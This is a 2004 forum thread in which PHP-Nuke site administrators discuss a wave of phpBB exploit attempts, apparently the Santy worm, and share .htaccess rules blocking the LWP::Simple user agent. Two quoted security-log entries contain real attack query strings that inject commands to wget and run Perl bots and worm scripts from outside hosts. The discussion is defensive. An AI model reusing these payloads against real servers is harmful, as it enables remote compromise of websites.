Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™
Author Message
TheosEleos
Life Cycles Becoming CPU Cycles


Joined: Sep 18, 2003
Posts: 960
Location: Missouri

PostPosted: Fri Dec 24, 2004 9:34 am Reply with quote

Only registered users can see links on this board! Get registered or login!

And they got owned.

_________________
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website AIM Address ICQ Number
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Fri Dec 24, 2004 9:37 am Reply with quote

Groovy
 
View user's profile Send private message
coldblooded
New Member
New Member


Joined: Jul 05, 2004
Posts: 11
Location: Right here

PostPosted: Fri Dec 24, 2004 12:15 pm Reply with quote

They've been hammering on our forums with a combination on highlight and rush scripts, every couple minutes or so, for the last 12 hours from a variety of IPs. Sentinel is easily one of the most important projects for Nuke to come out. worship
 
View user's profile Send private message Visit poster's website
blarneystone
Client


Joined: Sep 18, 2004
Posts: 62

PostPosted: Fri Dec 24, 2004 12:34 pm Reply with quote

371 Attack attempts on my site so far TODAY! Sentinal stopped every one

Thanks for a great utility! Wave
 
View user's profile Send private message Visit poster's website
Raven
PostPosted: Fri Dec 24, 2004 2:14 pm Reply with quote

Add this line to your .htaccess in the list of bots that you block at the end, so that
RewriteCond %{HTTP_USER_AGENT} ^Zeus
becomes

RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ emailsforyou.php [L]

Now you may have a different RewriteRule.
 
CurtisH
Life Cycles Becoming CPU Cycles


Joined: Mar 15, 2004
Posts: 638
Location: West Branch, MI

PostPosted: Fri Dec 24, 2004 3:13 pm Reply with quote

coldblooded wrote:
They've been hammering on our forums with a combination on highlight and rush scripts, every couple minutes or so, for the last 12 hours from a variety of IPs. Sentinel is easily one of the most important projects for Nuke to come out. worship


I have had over 100 of these attempts today, different IP each time. Is this the santy thing or are these individuals?

User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: curtishancock.net/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

_________________
Those who dream by day are cognizant of many things which escape those who dream only by night. ~Poe 
View user's profile Send private message Visit poster's website Yahoo Messenger
Raven
PostPosted: Fri Dec 24, 2004 3:18 pm Reply with quote

If it's not, it's a carbon copy. It's trying to exploit phpbb so I imagine it is.
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9456
Location: Arizona

PostPosted: Sat Dec 25, 2004 6:11 pm Reply with quote

Raven,
I am new to modifying .htaccess. Sentinel is adding the deny's at the end of the file. Do we place the Rewrite commands in front of where Sentinel has started to write the deny statements?

Thanks for the help! Getting concerned with how these guys even found my site. I thought I was careful to keep it out of the search engines. It is strictly a family site. Bummer... wish these guys would put their skills to "good" rather than all this stupid mayhem...

TIA,
montego
 
View user's profile Send private message Visit poster's website
PHrEEkie
Subject Matter Expert


Joined: Feb 23, 2004
Posts: 358

PostPosted: Sat Dec 25, 2004 7:27 pm Reply with quote

Put it at the top, then a space between it and where Sentinal has started adding IP's. Make sure to have the blank space at the end of the Sentinal bans so that it can continue adding them.

PHrEEk

_________________
PHP - Breaking your legacy scripts one build at a time. 
View user's profile Send private message
montego
PostPosted: Sat Dec 25, 2004 8:36 pm Reply with quote

Well, the following is NOT stopping the abuse attempts. I am still getting the emails from Sentinel still. Not sure what is wrong. Is there another setting that I may have to turn on in the .htaccess file to get it to work?

Here is what I currently have in my .htaccess file:

Code:


RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ScriptViolation.php [L]
RewriteEngine Off


The user agent is showing up as User Agent: LWP::Simple in my Sentinel emails. Does this sound like Apache isn't doing what I am trying to tell it to do?

TIA,
montego
 
Raven
PostPosted: Sat Dec 25, 2004 8:56 pm Reply with quote

Try changing [NC,OR] to [NC, OR]
 
PHrEEkie
PostPosted: Sat Dec 25, 2004 8:59 pm Reply with quote

Apache needs to have mod_rewrite enabled, but that's fairly standard stuff.. can't imagine a host having that disabled, but then again, nothing really surprises me anymore... lol

PHrEEk
 
Raven
PostPosted: Sat Dec 25, 2004 9:05 pm Reply with quote

Great point. I just take that for granted
 
montego
PostPosted: Sun Dec 26, 2004 8:01 am Reply with quote

Does apache have to be restarted after I change the .htaccess file? I just verified that my Hosting company just upgraded to 4.3.10 PHP (just this morning!) and it does have mod_rewrite module as a loaded module. Does this mean it should be enabled?

Also, strangly enough, after I updated my .htaccess file last night, Sentinel stopped writing IP addresses to it. The "kiddies" are still getting banned but I am losing server-level protection... I don't like that idea. Hence my question about restarting Apache OR if I need to do something in Sentinel to get it to log again?

You guys are great!
montego
 
Raven
PostPosted: Sun Dec 26, 2004 8:25 am Reply with quote

No on restarting Apache. NukeSentinel never sees these now because they are blocked at the server level.
 
montego
PostPosted: Sun Dec 26, 2004 8:29 am Reply with quote

Raven, but I am still getting emails from Sentinel on these exact same abuses... as mentioned in my post. How can this be?
 
Raven
PostPosted: Sun Dec 26, 2004 8:33 am Reply with quote

Since, for some yet unknown reason, the .htaccess code is not working on your site, NukeSentinel is still protecting you Smile. Do you have the .htaccess code at the very top of your .htaccess?
 
montego
PostPosted: Sun Dec 26, 2004 8:38 am Reply with quote

I will PM you with my .htaccess code up to where the IP addresses were getting added. Sorry for being such a pest. It is just so unnerving to have someone going after me and my family!
 
Raven
PostPosted: Sun Dec 26, 2004 8:42 am Reply with quote

Hopefully the changes you mentioned will work!
 
montego
PostPosted: Sun Dec 26, 2004 9:03 am Reply with quote

Uuuuggghhhhh.... they just tried again! I just don't understand why .htaccess is not working as expected. Here is the attack email text:

Code:


Date & Time: 2004-12-26 07:00:22
Blocked IP: 69.44.153.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: LWP::Simple/5.65
Query String:
mysite.com/modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt
Forwarded For: none
Client IP: none
Remote Address: 69.44.153.20
Remote Port: 37526
Request Method: GET


Any thoughts? I just cannot see why the .htaccess commands are not working. I am going to have to submit a ticket to my web host!

UUUgggghhhhh
 
montego
PostPosted: Sun Dec 26, 2004 9:54 am Reply with quote

Contacted my web hosting company. They made it sound like they had to make a chg to the conf file to enable rewrite! They have done so now, so we'll now see if this blasted code finally works for me. Bang Head

Sure appreciate everyone's help on this. Such a pain. Hopefully all the work on this recently will help improve many of our skills in addressing these issues ourselves in the future. I have certainly learned a thing of two.

If you do not hear back from me, Raven, then you'll know it is working. So far so good...

montego
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©